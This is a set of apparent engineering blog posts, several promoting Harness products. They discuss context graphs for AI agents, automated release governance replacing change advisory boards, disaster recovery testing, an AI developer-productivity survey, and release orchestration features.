The Glean engineering team puts it concisely: "what" exists vs. "how" change happens. Their model treats actions as first-class nodes in the graph, with edges encoding causality and correlation. Other formulations exist, but the central idea is consistent across them.
Most production designs end up with a layered architecture, even if teams don't always name the layers the same way:
Layer 1: knowledge graph. Entities and the static relationships between them. Service A depends on service B. User U owns repo R. Ticket T is linked to incident I. This is the substrate. Without it, you don't know that "ACME Inc" in your CRM and "Acme" in support is the same customer, and any aggregate analysis turns to mush.
Layer 2: personal graph (or activity stream). A per-user temporal sequence of actions: viewed doc, edited file, commented on PR, joined channel, deployed service. The signals are noisy on their own. Real work is messy. People context-switch constantly, reuse the same document across efforts, and abandon threads only to pick them back up days later. The job at this layer is to stitch raw events into coherent units of work.
Layer 3: context graph. Aggregate, anonymized patterns derived from many personal graphs. This is where you get statements like "P1 incidents in this product area resolve in 30 minutes 80% of the time and almost always pass through these four steps." It is a probabilistic model of organizational process, not a static workflow definition.
Another way to look at the same architecture: a context graph is two intertwined graphs operating over the same entities. One is structural — nodes and edges representing the static relationships in your organization. The other is executional — transitions and actions that move those entities through their lifecycle over time. The context graph emerges from their combination. Neither graph alone is sufficient: the structural one tells you what could be touched in a given situation, the executional one tells you what actually gets touched, and only the intersection produces a model that's useful to an agent. The three layers above are one way to slice this; the structural/executional split is another, and they map onto each other cleanly. Layer 1 is mostly structural, Layer 2 is mostly executional, and Layer 3 is where the two are joined under a shared semantic frame.
Sitting under all three is a semantic layer that defines what each thing actually means: an "incident" in the graph maps to a specific schema, with specific attributes and lifecycle states, regardless of which tool emitted the event. Without this, you're shoveling JSON between systems and hoping the LLM figures it out.

This question comes up constantly, so it's worth being precise. A knowledge graph is structural. It models entities and explicit relationships. A context graph adds time and behavior. It models the temporal sequences of actions that move entities through their lifecycle.
You can build a useful knowledge graph without any context graph. People have been doing it for decades with RDF, property graphs, ontologies, and graph databases. What you can't build without a context graph is a model of how work actually happens in your organization.
Concretely, a knowledge graph might tell you:
A context graph layered on top adds:
Each of those statements requires walking entity relationships and looking at temporal action sequences. Neither layer is sufficient on its own.
There's a related comparison worth making, because process mining shows up often in conversations about this and the differences are easy to miss. Traditional process mining assumes relatively structured enterprise workflows running through bounded event systems — ERP, CRM, BPM platforms with consistent event logs and a finite set of process types. The job is to reconstruct an actual process from those logs and then report or optimize against a predefined target. The environment is controlled. The schemas are known. The processes have names.
Context graphs operate in a different environment. The work being modeled is fragmented across chat, docs, tickets, source control, observability tools, calendars, and increasingly agent actions themselves. There is no single event log, no shared schema across tools, and no predefined target workflow to compare against. The underlying systems weren't designed to emit process traces; the traces have to be inferred from messy signals across tools that don't know about each other and weren't built to be joined.
The objective also differs. Process mining tends toward reporting and optimization of workflows you already know exist. A context graph is trying to build an adaptive, agent-consumable model of how work actually happens across structured and unstructured systems — including the parts that no one has ever formally defined as a process. The output isn't a dashboard for a process owner; it's a substrate for agent reasoning that updates as the organization changes.
Put another way: process mining is an analytics problem in a controlled environment. Context graphs are a behavioral modeling problem in an uncontrolled one. The system isn't mining workflows. It's learning organizational behavior, and most of that behavior was never written down.
LLMs can already call tools. The harder problem is that they don't know which tools to call, in what order, on which entities, to accomplish a real task in your environment. They have no model of your organization's process.
Documentation describes intent. Systems of record capture state. Neither captures the actual flow of work. When you ask an agent to "investigate this alert," "draft this proposal," or "onboard this customer," it has to assemble the workflow itself, usually with limited success.
A context graph fills the gap. It gives an agent a learned model of "what tends to happen and in what order" for the situations the agent encounters. Instead of hard-coding workflows in playbooks, the system surfaces the most probable path for the current scenario, and the agent can deviate when the situation warrants.
There's a related constraint that the Harness engineering team frames well: the context window is RAM, and RAM is finite. Every token spent on infrastructure noise is a token that can't be spent on reasoning. A context graph is only useful if the agent can pull just the relevant slice of it into context at the moment it's needed. Loading the whole graph blows the budget.
There's no standard schema yet, but the shape that recurs across implementations is roughly this. An abstracted trace step (the kind that gets aggregated into the context graph) might look like:
{
"trace_id": "trace_8f2a...",
"step_index": 3,
"timestamp_relative_ms": 142000,
"action_type": "comment",
"tool_family": "ticketing",
"entities": {
"incident_id": "INC-2391",
"service_id": "payments-api",
"team_id": "iam"
},
"process_tags": ["investigate_alert", "p1_response"],
"outcome": null,
"duration_ms": 86000
}
Two things to notice. First, no raw text. No message bodies, no doc contents, no user identifiers. The aggregation is over abstracted steps, not raw activity. Second, knowledge graph entity IDs are first-class on every step. That's how the context graph stays tied to the substrate. Without those IDs, the patterns you mine are interesting but not actionable.
There's no canonical architecture for context graphs yet. The components that recur across teams shipping one are roughly these.
You can't model what you can't observe. The first investment is connector coverage broad enough to capture change events across the tools where work actually happens: source control, CI/CD, ticketing, chat, docs, calendars, observability, identity. Snapshot data is necessary but not sufficient. You need the event stream of changes over time.
This is harder than it sounds. Each tool has its own API, rate limits, and idea of what "changed" means. Identity reconciliation alone is its own minor industry. The same human is priya@example.com in Slack, priya.k@example.com in GitHub, and Priya Kumar (Engineering) in your HRIS. Until you can prove those are the same person, your aggregates lie to you.
Before you put events in a graph, you need agreement on what entities mean. A deployment event from your CD tool, a release from your CI tool, and a change in your ITSM system might describe the same physical action, or three different ones. Without a canonical model, downstream queries are unreliable.
Harness's framing is useful here: the semantic layer is the source of truth for the structure and meaning of the data, and it enforces consistent definitions across tools. This is not supporting infrastructure. It is the substrate the rest of the system depends on. Every aggregation, every query, and every agent decision downstream inherits its meaning from this layer. Get it wrong and the layers above don't fail loudly; they produce confidently wrong output. You can implement it with formal ontologies, JSON Schema, protobuf, or a registry of resource types. The implementation choice is less consequential than the discipline of treating the canonical model as load-bearing and making every connector conform to it.
Raw event streams are not directly useful. A given person edits a doc, switches to Slack, opens a PR, runs a build, comes back to the doc. Are those one task or three? The graph needs to carve continuous activity into bounded units of work.
The approaches that work in practice combine cheap signals (shared titles, links between artifacts, time windows, channel names) with an LLM step that looks at sequences of events and infers semantic boundaries: "this cluster looks like investigating an alert," "these actions look like drafting a spec." The output is a labeled task with a coarse type, a duration, and a set of entities touched.
The cheap signals do most of the work. The LLM step is for cases where the cheap signals disagree or run out. Reverse the order and you'll burn a lot of tokens for marginal gains.
Once you have many personal task traces, you aggregate. Normalize each trace into a sequence of anonymized steps: action type, tool family, knowledge graph entities involved, derived process tags, lightweight timing. Compute similarity between traces. Group similar traces. Mine the most common paths.
The output is a probabilistic model: for situations of type X, the typical sequence is A, B, C with probabilities p1, p2, p3, and timing distributions T1, T2, T3.
The word "probabilistic" is doing real work in that sentence, and it's worth pausing on. The graph is not canonical truth and shouldn't be presented to downstream consumers as one. Real organizational processes are noisy, overlapping, partially observable, and constantly evolving. The same situation can resolve through three different paths depending on who's on call, what week of the quarter it is, and which subsystem happened to fail first. A model that collapses that reality into a single deterministic process will quietly mislead the agents that consume it, and the failure mode is the worst kind: confident, plausible, wrong.
Good implementations carry the uncertainty forward rather than papering over it. Each inferred path gets a confidence score that reflects how well the underlying traces actually support it. Temporal weighting decays older traces so the model tracks recent reality instead of the org chart from six quarters ago. Competing paths for the same situation are kept as parallel hypotheses with their own probabilities, not collapsed into the highest-frequency one. Sparse situations are flagged as low-confidence rather than presented with false precision.
The agent consuming the graph then has to reason under that uncertainty: pick the most probable path when confidence is high, surface alternatives when it isn't, and fall back to first-principles reasoning when the situation is novel enough that the graph has no strong signal. The graph's job is to make the uncertainty legible to the agent above it, not to hide it behind a single most-likely answer.
The Glean blog calls out a useful constraint here: only treat a pattern as viable if it appears across at least k distinct users and n independent traces. Below that threshold, you're modeling individuals, not processes, and you're at real risk of leaking PII through deanonymization. Pick your k and n before you ship, not after.
Pure graph stores are great for traversal but rigid for free-form text. Pure vector stores are great for semantic similarity but blind to structure. A hybrid approach is what most teams converge on: graph entities and edges for relationships, with text chunks tagged by entity IDs that get embedded for semantic search.
This is the same pattern that underpins KG + RAG systems more generally. The graph provides depth (relationships, lineage, ownership). The vector index provides breadth (matching free-form queries to relevant content). The semantic layer ties them together so that "the auth incident from yesterday" resolves to a specific node, not a set of approximately-relevant text fragments.
PLACEHOLDER: hybrid storage diagram. Show two parallel stores at the bottom (a graph database with nodes/edges, and a vector index with embeddings). Above them, a query layer that takes a natural-language question, decomposes it, hits both stores, and returns a unified result. Show entity IDs as the join key between the two stores. Optional: a third lane showing "process traces" stored as ordered sequences referencing the same entity IDs.
A context graph that stops learning is a static playbook with extra plumbing. The architecture only pays off if agent and human actions feed back in as new traces. When an agent runs a workflow, the outputs (which tools it called, in what order, with what result, whether the user accepted the output) become training signal. Successful runs reinforce the patterns. Failed runs flag anti-patterns where the model's predicted path didn't match reality.
This is where the system starts to get interesting from a reinforcement-learning angle. The graph functions as a policy the agent samples actions from, and that policy updates as the agent acts. The Glean piece makes a good operational point on this: if your agents run outside the system that owns the graph, the graph evolves one way and agent behavior evolves another. You end up with two divergent versions of reality. The graph and the orchestration layer have to share a feedback path.
Sunil Gattupalle at Harness frames the agent loop as an operating system. The mapping is more than rhetorical, and it does real design work for context graphs too:
If you take that mapping seriously, the design constraints fall out cleanly. You don't dump the whole context graph into the agent's context window any more than you would cat the entire filesystem into RAM. You build query primitives that let the agent pull the slice it needs.
The Harness MCP redesign is a useful concrete example. The team went from 130+ endpoint-shaped tools to 11 generic verbs (list, get, create, update, execute, describe, diagnose, and a handful of others) backed by a registry that dispatches to the right resource type. The tool count stays constant; capability grows in the registry. Whatever your stack, the underlying lesson holds: keep the agent's "menu" small, push capability into queryable backends, and let the agent reason about what to fetch rather than parse a giant tool catalog.
The same lesson applies to context graphs. You don't expose 50 tools that each query one slice of the graph. You expose a small set of generic query verbs (describe_process, find_similar_traces, get_typical_path) and let the graph itself hold the variety.
PLACEHOLDER: agent loop / OS mapping diagram. Two columns side by side. Left column: classic OS stack (process → syscalls → kernel → drivers → hardware). Right column: agent stack (LLM reasoning → tool calls → harness/kernel → resource registry → backend systems and graphs). Horizontal arrows showing the analogous components.
Patterns that go wrong in real implementations:
Storing events without entity resolution. If you can't reliably say two different event streams are about the same logical entity, your aggregation is meaningless. Identity reconciliation is unglamorous and load-bearing.
Treating the context graph as static. Process changes constantly. Tools come and go. Teams reorg. If your graph stops ingesting and re-aggregating, it ages out fast. Anything older than a quarter is suspect for active processes.
Underinvesting in the semantic layer. Without a canonical model of what entities and actions mean, graph rot accelerates. New tools get integrated with ad-hoc mappings. Queries return inconsistent results. Engineers stop trusting it.
Hard-coding workflows on top of the graph. The whole point is that the system learns process. If you turn around and embed a fixed playbook on every common path, you've built a regular workflow engine with extra plumbing.
Ignoring k-anonymity in aggregation. Aggregate process insights derived from a small number of users are deanonymized personal graphs in disguise. Pick a threshold and enforce it before you ship.
Letting context drift from execution. This is the divergence problem above. The graph that informs the agent and the system the agent acts in have to share a feedback path, or they will desynchronize within weeks.
Loading the wrong thing into context. A 50KB process description in the agent's working memory is 50KB you don't have for reasoning. Design the graph's query API to return small, focused slices. If the only way to use the graph is to dump it, the agent will degrade.
A common question once you have a context graph is whether it's actually useful. Some signals worth tracking:
Coverage. What fraction of meaningful work in your org is represented in the graph? If your most expensive processes aren't in it, the graph isn't helping where it matters.
Path agreement. When an expert is asked to describe how X usually happens, does their description match the graph's most probable path for X? This is a sanity check for trace stitching and aggregation. Disagreement is informative either way: either the graph is wrong, or the expert is describing the ideal rather than what really happens.
Agent task completion. Agents grounded in the graph should complete relevant tasks at higher success rates than agents using only documentation or only tool descriptions. If they don't, the graph is too noisy or too sparse, and you have a calibration problem upstream.
Time-to-fresh. How long after a real-world process changes does the graph reflect it? If it takes weeks, you have built a museum, not a model.
Context cost. What's the average number of tokens an agent spends pulling relevant context from the graph for a given task? Track this over time. If it's growing, your query API is leaking abstraction.
There isn't a standard schema for context graphs the way there is for distributed traces (OpenTelemetry) or feature stores. Every team rolls their own. That's fine for now because the design space is still being explored, but it makes federation across organizations and tools harder than it needs to be. The closest adjacent standard is OCSF for security events, which has the right shape but the wrong domain.
If you're building a context graph today, document your schema with the same rigor you'd apply to a public API. Future-you, and any other team that integrates with your graph, will appreciate it.
Context graphs sit at the intersection of three things engineers have been shipping pieces of for years: knowledge graphs, activity streams, and agentic systems. The new and useful synthesis is the combination. A context graph captures how work actually happens, not just what exists, and it gives agents a structured, queryable model of process to ground their reasoning in.
Whether you call it a context graph, a process graph, a behavioral graph, or just an aggregate activity model, the design constraints are the same. Capture events at depth. Resolve entities to canonical forms. Stitch traces into tasks. Aggregate patterns under privacy thresholds. Store hybrid (graph plus vector). Treat agent execution as both consumer and producer of the graph. Keep the agent's working memory clean.
The teams building this well aren't reinventing graph databases. They're applying old systems-engineering principles (small stable interfaces, demand paging, content-addressable storage, feedback loops) to a problem that's only become tractable in the last couple of years.


The thing with Change Advisory Boards is that the intent was always good. Get smart people in a room, look at the evidence, and make sure nothing catastrophic goes out the door. In theory, that's hard to argue with.
It doesn't scale in practice. Things happen between meetings. Teams rush to hit the window. The CAB meeting may not catch every risky deployment, but at least everyone can feel good about the process before the incident happens.
Automated release management asks a different question entirely. Not "did a human approve this?" but "has this change actually proven it's safe?" Governance moves into the pipeline itself, running the same checks on every change at whatever speed your teams ship.
That's exactly what Harness Continuous Delivery is built for: policy-driven pipelines, automated assurance, and governance that scales with your teams.
Automated release management replaces manual review and approval steps with automated quality gates, policy enforcement, and deployment orchestration.
Rather than routing change decisions through a central committee, automated systems evaluate each change against defined criteria like test coverage, security scans, rollback definitions and compliance checks, then approve or block it based on objective results.
That does not get rid of governance. It brings governance into the delivery pipeline and consistently applies it to all changes, not just the ones that make it onto a CAB agenda.
Automated release management paired with a continuous delivery platform allows teams to deploy frequently, recover quickly, and audit completely, with no meeting necessary.
The CAB model made sense when software changed slowly and release cycles were long. Cross-functional stakeholders would review evidence packets, testing results, deployment plans, security scans and determine if a release was safe to promote.
The problem is that the model doesn't scale well as the speed of delivery accelerates. Some patterns keep repeating themselves:
DORA's research provides a useful gut-check here: high-performing engineering teams deploy far more frequently than their peers with lower change failure rates, not higher. It's not approval volume that matters; it's pipeline discipline.
The fundamental problem is not that governance is bad. It is that a meeting-based governance model cannot keep up with a continuous delivery operating model.
The difference in automated release management boils down to a different question at the heart of the process.
Old model: Who approved this? New model: What did this change prove before we shipped it?
That reframe yields a meaningfully different architecture. Governance takes place on every change, not at scheduled times. Pass/fail criteria are deterministic, not subjective. Compliance is an output of the pipeline, not a prerequisite to enter it.

All changes must be traceable without requiring manual compilation. Version control becomes the single source of truth. CI systems automatically generate commit history, build artifacts and deployment-linked changelogs as part of normal pipeline execution. By default, the audit trail is there.
Harness GitOps takes this a step further, using Git as the single source of truth for the state of the deployment. All configuration changes are versioned, all deployments are tracked, and drift is detected automatically.
Validation moves from presentations to execution. Quality gates run on every change: unit and integration tests, end-to-end validation, security and compliance scans, and performance checks. These are not release-window activities. They are part of the standard CI/CD pipeline, running continuously on every change that moves through.
Harness Powerful Pipelines supports multi-stage pipeline orchestration across complex environments with built-in test intelligence and conditional execution logic. Quality gates run fast and don't create unnecessary bottlenecks.
CAB rules get codified in an automated release management model. No critical vulnerabilities before production promotion. Minimum thresholds for test coverage. Mandatory rollback procedure definitions. These policies are automatically enforced in the pipeline. Pass, and the change proceeds. Fail, and it's reliably blocked at scale, with no human bottleneck in the critical path.
That's what policy as code is all about: governance that's version-controlled, auditable and applied the same way every time.
Harness DevOps Pipeline Governance lets teams define and enforce pipeline policies in one place. Compliance is not something you check at the end. It's something the pipeline enforces throughout.
Even with strong quality gates, production deployments carry residual risk. Test environments do not always mirror what production surfaces.
Harness AI-Assisted Deployment Verification automatically analyzes deployment health using ML to compare metrics, logs and traces against baseline behavior. When something drifts, it surfaces the signal quickly, enabling rollback before an incident escalates. This closes the loop between deployment and validation, making the pipeline genuinely self-correcting, not just self-approving.
In practice, systems rarely exist in isolation. One change can affect backend services, APIs, web apps, mobile apps and edge targets all at once. In tightly coupled systems, changes to one component can cause another to break, and partial deployments can be risky without careful coordination.
Traditional coordination uses spreadsheets, emails, and war rooms. Modern automated release management means orchestration: platforms that model service dependencies, trigger pipelines in the right order, and ensure all components pass quality gates before release. Multi-team coordination becomes a single-action, end-to-end deployment.
Harness Continuous Delivery has built-in support for orchestrated multi-service deployments with dependency mapping and conditional promotion logic. Deploy Anywhere extends this to cloud, hybrid, on-prem and edge environments without requiring separate toolchains for each target.
Harness pipelines also support canary deployments and GitOps-based progressive delivery for rollout strategies tailored to deployment risk.
Managing interdependent releases is a good start. The goal is to reduce the coupling itself so teams can ship independently without synchronized multi-team deployments. Three practices tend to accelerate that:
Together, these patterns move teams toward the continuous delivery ideal: frequent, small, independent releases, each of which is safe on its own.
The results of replacing CAB-driven processes with policy-driven pipelines and automated assurance are measurable:
Harness CD Visualize DevOps Data surfaces deployment frequency, change failure rates and mean time to recovery in real time. These are the DORA metrics that measure delivery health with zero instrumentation overhead.
CABs were created for a slower world, where a weekly review meeting could credibly keep up with the cadence of releases. That world is long gone for most engineering organizations today.
The takeaway here is this: automated release management doesn't remove governance. It rebuilds governance as a system that is fast, consistent, auditable and embedded directly in the delivery pipeline. The teams that move fastest aren't the ones with the loosest controls. They're the ones with controls that don't slow them down.
If you're ready to move from approval bottlenecks to automated assurance, Harness Continuous Delivery is built for exactly that.
Automated release management is the practice of using automated quality gates, policy enforcement and deployment orchestration to replace manual approval steps in the software release process. Rather than routing changes to a committee, the pipeline evaluates each change against predefined criteria and approves or blocks it based on objective results.
A CAB relies on scheduled human review to approve changes before they go into production. Automated release management takes that validation and builds it into the pipeline itself, running the same checks on every change instead of batching them for periodic review. The result is faster delivery with more consistent governance.
Quality gates are automated checkpoints a change must pass before moving to the next stage. Common examples include test coverage thresholds, security scan results, and performance benchmarks. A change that fails a gate is blocked automatically, without human intervention.
Policy as code is the practice of expressing governance rules in version-controlled configuration files rather than documents or meeting agendas. The pipeline then automatically enforces those rules on every deployment, making compliance consistent and auditable by default.
Feature flags decouple code deployment from feature activation. Teams can ship code continuously without exposing unfinished features to users, and can disable a feature instantly if it causes issues in production, without triggering a full rollback.
Incremental strategies like canary deployments work well because they limit the blast radius of any given change. Paired with automated verification, the pipeline can catch problems early in the rollout and halt or roll back before they affect all users.
Harness Continuous Delivery provides end-to-end pipeline orchestration, built-in policy governance, GitOps-based change tracking, AI-assisted deployment verification, and real-time DORA metrics. It's designed to replace manual release processes with automated systems that scale across any environment.


Most organizations don't fail at disaster recovery because they lack technology. They fail because they never tested their plans under realistic conditions. A runbook that hasn't been rehearsed is just a document. A backup that hasn't been restored is just a hope. If you're new to the topic, start with our introduction to disaster recovery testing before diving into this guide.
This guide is for teams who want to move from theory to practice. Whether you're an SRE managing recovery playbooks or a manager responsible for business continuity outcomes, the steps here will help you build a DR testing program that holds up when it matters most.
We'll walk through why DR testing is foundational, how to run it end-to-end, where most teams hit friction, and how modern tooling, including Harness, can close those gaps.
The word "disaster" conjures floods and fires, but the most common causes of major incidents in 2026 are far more mundane. Ransomware, misconfigurations, expired certificates, regional cloud disruptions, supply chain compromises, and plain human error account for the vast majority of outages. The fallout is predictable: revenue loss, missed SLAs, compliance findings, and lasting damage to brand credibility.
Regulatory and contractual pressure is also increasing. Frameworks like ISO 22301, ISO/IEC 27001, PCI DSS, HIPAA, and FFIEC now expect documented evidence of periodic DR testing, recorded outcomes, and tracked remediation, not just recommendations. In cloud environments, shared responsibility models still place the burden of workload recovery squarely on customers.
Teams that test proactively gain real advantages:
The most effective DR programs treat testing as a product, not a project. A one-time exercise produces a snapshot. A repeatable lifecycle produces institutional resilience.
The lifecycle has three phases: Plan and Prepare, Execute and Monitor, and Review and Improve. Each phase feeds the next, and each test cycle should make the following one more efficient and more realistic.
A poorly scoped test wastes time and produces misleading results. Planning is about defining what success looks like before you start.
Don't skip the last point. Auditors and post-incident reviews both depend on evidence. If you can't prove what happened during the test, the test didn't happen.
Execution is where plans meet reality. The goal is to follow the runbook faithfully while capturing everything that deviates from expectations.
A common mistake is running the test and only reviewing results afterward. Active monitoring during execution lets you catch cascading failures early and make real-time decisions, which is exactly the skill you're building.
The after-action review is where a DR test becomes a DR program. Skip it, and you'll repeat the same failures.
Treat your DR testing checklist as a living document. Each cycle should produce a cleaner, more accurate version than the previous one.
Even well-intentioned DR programs run into predictable friction. Here's where teams typically struggle and how to build guardrails that help.
Full failover exercises require infrastructure, staff time, and a willingness to disrupt normal operations, all of which compete with feature delivery and day-to-day priorities.
The solution is a tiered testing schedule. Automate frequent, lightweight checks for lower-priority tiers. Reserve deep exercises for critical systems, and schedule them with enough lead time to secure capacity. Use on-demand cloud resources and ephemeral environments to run tests without provisioning dedicated infrastructure that sits idle between cycles.
Recovery doesn't belong to one team. It spans networking, security, databases, applications, and support functions. Without clear ownership, tests stall at handoff points.
Establish RACI matrices that specify who is responsible, accountable, consulted, and informed for each test phase. Secure executive sponsorship so that participation is a priority, not optional. Design scenarios that reflect the real risks each team faces, people engage more seriously when the exercise feels relevant to their work.
Tests routinely surface undocumented dependencies, third-party SLA gaps, inconsistent IAM policies, and backups that restore corrupted or incomplete data. These findings can feel like failures, but they're actually the whole point.
Prioritize findings by business impact and remediate iteratively. Maintain configuration baselines and use drift detection to keep recovery environments aligned with production. Retest after remediation to confirm the fix holds.
Traditional DR testing required weeks of manual coordination, isolated toolchains, and one-off scripts that didn't connect to the systems teams already used. Harness Resilience Testing changes that by bringing chaos testing, load testing, and disaster recovery testing together in a single platform.
Instead of running each discipline separately, teams orchestrate everything inside their existing pipelines. Recovery steps can be automatically validated, failovers triggered, and monitored within CI/CD workflows, and risks surfaced early before they become incidents. The Harness Resilience Testing documentation walks through configuring and running these tests end-to-end, including chaos injection, load scenarios, and DR validation within a single orchestrated workflow.
The integrated approach removes the friction that causes most DR testing programs to atrophy. When testing fits into the tools and workflows engineers already use, it stops feeling like a separate project and becomes part of how work gets done. Teams using this kind of platform report faster recovery times and fewer surprises when real incidents occur.
A single DR test tells you where you stand on a single day, under a single set of conditions. A repeatable testing program tells you whether your resilience is improving over time and gives you the evidence to prove it to auditors, executives, and customers.
The lifecycle described here, planning with clear objectives, executing with discipline, and reviewing with rigor, is designed to compound. Each cycle should refine the next. Runbooks get sharper. Dependencies get documented. Gaps get closed before they become outages.
Once your testing process is solid, the next step is building a mature, metrics-driven program around it. In the next blog in this series, we'll cover DR testing best practices, the role of automation, and the metrics that tell you whether your resilience program is actually working. And if you missed the start of the series, catch up with our introduction to disaster recovery testing first.


For the past year, I've been hearing a version of the same thing from engineering leaders: AI tools are working, productivity is up, the business case is there. And yet, something about the picture still feels incomplete. So we decided to go find out how widespread that feeling actually is. We surveyed 700 engineers and managers across five countries, and published the results in the State of Engineering Excellence 2026.
89% of engineering leaders say developer productivity has improved since deploying AI. It's a clean story. AI is working. Engineering teams are moving faster.
But, we also found that 81% of those same leaders say code review time has gone up since deploying AI. Significantly up, in a lot of cases. And, developers estimate that roughly a third of their day is now consumed by AI-related work that remains largely invisible to traditional productivity metrics.
So which is it? Is AI making engineering teams more productive, or simply shifting effort into places they don’t yet measure? After sitting with this data for a few weeks, the answer is both. That's the more honest read, even if it's less satisfying.
AI has been very good at increasing output. Simultaneously, it has not automatically delivered more shipped value.
I talked to a customer recently, a large enterprise engineering org, and they were genuinely proud of how much their output metrics had improved. Lines of code written, PR velocity per developer, tickets closed, features delivered. All of it up. Then we dug into what was actually making it to production, and the numbers looked much less clean. A meaningful share of AI-generated code was not getting to production.
Most organizations can tell you how much AI code was accepted. Very few can tell you how much of it actually landed in production, and that's the number that matters. Hard dollars spent on agent compute that never shipped anything isn't a productivity story. That's a visibility gap, and it's one most organizations aren't measuring today.
The 31% figure, the estimated share of developer time now consumed by AI-related work that appears in no metric, probably sounds abstract until you break down what it actually is.
It's a developer sitting with a pull request for 45 minutes because the AI-generated code is technically correct but written in a style nobody on the team recognizes, and they need to fully understand it before they can approve it. It's debugging a subtle edge case that the AI missed, which takes longer to track down than writing the function would have. It's working with 10 agents in parallel on 10 different tasks. None of this makes it into velocity or cycle time, and even code review metrics only catch a fraction of it.
What this data shows is that organizations are running a business where the costs are partially off the books. You can show your CFO a 20% productivity improvement and that's true. You just can't show them what it cost to get there.
The finding that surprised me most: 89% of engineering leaders say their current metrics accurately reflect AI's impact. And 94% say key factors like tech debt, validation time, and developer burnout are missing from those same metrics.
When there's no established standard for measuring something, people default to trusting the frameworks they already know. Not because they've validated them for the new environment, but because they're familiar. High confidence in an incomplete system is a coping mechanism, not an accuracy signal.
The lesson: confidence in your measurement system should go up as you add instrumentation, not stay high when important dimensions of the work are still invisible. When 94% of leaders acknowledge gaps and only 6% think they're equipped to close them, that's not a minor calibration issue. That's a signal worth taking seriously.
54% of practitioners fear individual performance evaluations based on AI productivity data. Managers, by contrast, show far greater comfort with these systems: they are nearly four times more likely than developers to report having no concerns at all.
Measurement systems almost always get built top-down, by the people who won't be measured by them. The practitioners who experience the day-to-day pressures of AI adoption, and who understand where invisible overhead actually lives, are rarely involved in defining the frameworks used to measure it. The result is a system that captures what leadership can see and misses what developers actually experience.
What developers said they need is straightforward: keep improvement data separate from performance evaluation, be transparent about what's being measured, and involve them in defining the metrics. None of that is technically hard. It requires organizational commitment. When measurement feels like surveillance, you don't get accurate data. You get people performing for the system instead of working in it.
The productivity gains from AI are real. The problem is that organizations are making multi-year investment decisions with dashboards built for a different era, and the gap between what those dashboards show and what's actually happening widens as AI adoption scales.
This is a problem we’ve been thinking deeply about at Harness. We’re working on new capabilities in Software Engineering Insights (SEI) that are designed to give engineering leaders visibility into the full picture: not just how much code is being generated, but how much of it is shipping, what the review and validation overhead actually looks like, and where AI spend is producing returns versus producing churn.
We believe the next generation of engineering measurement needs to be built for AI-native workflows, and we’ll be sharing more about that direction in the coming weeks.
Getting the measurement right isn't a reporting exercise. It's what makes the productivity gains from AI sustainable.
Download the full State of Engineering Excellence 2026 report [here].


Modern software delivery has evolved far beyond single-service deployments. Today's releases span dozens of services, multiple teams, and complex approval workflows—coordinated through spreadsheets, Slack channels, and manual checklists scattered across tools. When a production release involves deploying ten microservices across three environments, enabling five feature flags, running security scans, collecting approvals from four stakeholders, and coordinating with three different teams, the question isn't whether you can ship—it's whether you can track what shipped, when it shipped, and who approved it.
Release Orchestration solves this. It provides a unified framework for modeling, scheduling, automating, and tracking complex software releases across teams, tools, and environments—giving you end-to-end visibility from planning through production deployment and monitoring.
Without orchestration, enterprise releases become coordination nightmares. Status lives in spreadsheets that go stale within hours. Coordination happens through email threads spanning dozens of messages. There's no single source of truth for what was deployed, when, or by whom. Manual checklists drift out of sync. Approval workflows rely on memory and goodwill. And when something goes wrong at 2 AM, reconstructing what happened requires археology across multiple systems.
Release Orchestration transforms this chaos into structured, auditable, repeatable processes. Model your release blueprint once—defining phases, activities, dependencies, and approval gates—then execute it repeatedly with different configurations. Automate pipeline-backed steps while retaining manual sign-offs where governance requires them. Track activity-level status, phase-level progress, and overall release health in real time. Enforce approvals, capture sign-offs, and maintain a full audit trail linking code to deployment to business outcome.
The result? Releases that used to require days of coordination now run faster with complete visibility and zero spreadsheets.
Release Orchestration introduces a structured, visual approach to modeling and executing releases. Define Processes—reusable blueprints composed of Phases (Build, Testing, Deployment) and Activities (automated pipelines, manual approvals, or nested subprocesses). Release Groups define cadences and automatically generate releases. The Release Calendar provides unified visibility across all releases. The Activity Store and Input Store promote reusability—define once, execute many times with different configurations. And ad hoc releases let you execute any process on demand when you need flexibility outside your regular schedule.
At its core, Release Orchestration delivers the foundational capabilities enterprise teams need: process modeling with visual editors, scheduled and recurring releases through release groups, real-time execution tracking with dependency management, comprehensive audit trails for compliance, and AI-powered process creation that transforms natural language descriptions into structured workflows. These capabilities form the foundation for enterprise release management at scale.
Release Orchestration launches with a comprehensive set of capabilities designed for enterprise release management. Here's what you can do today.
Not every release fits a scheduled release. Customer-specific deployments, unscheduled maintenance, and process testing need one-off releases. Ad hoc releases let you create and execute releases on demand-select a process, configure timing, provide inputs, and optionally run immediately. Test new processes in isolation, handle customer deployments without disrupting your calendar, or orchestrate emergency maintenance with full tracking and audit capabilities.
Modern releases deploy multiple services across multiple environments. Release Orchestration's input system handles this through variable mapping—define global variables like releaseVersion and `targetEnvironment` once, and they flow automatically to all activities. Deploy to QA with "QA Inputs," production with "Production Inputs"—same process, different configurations. This eliminates repetitive data entry, ensures consistency, and scales from three services to thirty without growing complexity.
Release Orchestration integrates with Harness's centralized notification framework, delivering alerts when releases start, pause for input, complete, or fail. Route notifications to Slack, email, PagerDuty, Microsoft Teams, or webhooks. Platform teams managing multiple releases shift from reactive monitoring to proactive awareness—get notified immediately when action is required.
Compliance reviews and post-mortems require detailed records. Release Orchestration provides downloadable Excel reports with complete execution history—every activity, status, timestamps, approvals, and inputs used. Generate reports for individual releases (sprint retrospectives) or release groups (quarterly audits). Activity-level detail meets compliance needs; process-level overviews serve executive summaries. All execution data is captured in the audit trail, allowing you to reconstruct exactly what happened during any release.
As releases scale, filters help you focus. Filter by source (ad hoc vs recurring), status (in progress, completed, failed), time window (this sprint, Q1 2026), environment (production, staging), or scope (specific orgs/projects). Platform teams filter to ad hoc releases for one-off deployments. Release managers filter by status for in-progress releases. Compliance teams filter by date range for audit periods. Transform an overwhelming calendar into a focused view of exactly what you need.
Production incidents don't wait for your release cadence. Release Orchestration supports hotfix workflows that fast-track emergency releases while maintaining governance. Mark releases as hotfixes to distinguish them in calendars and reports. The system detects execution conflicts—if a hotfix targets an environment where a release is running, you get visibility to coordinate decisions. Hotfixes use the same process structure, ensuring that approvals and audit trails are maintained. The hotfix designation flows through reports and logs, documenting emergency procedures for post-incident reviews. Speed meets governance.
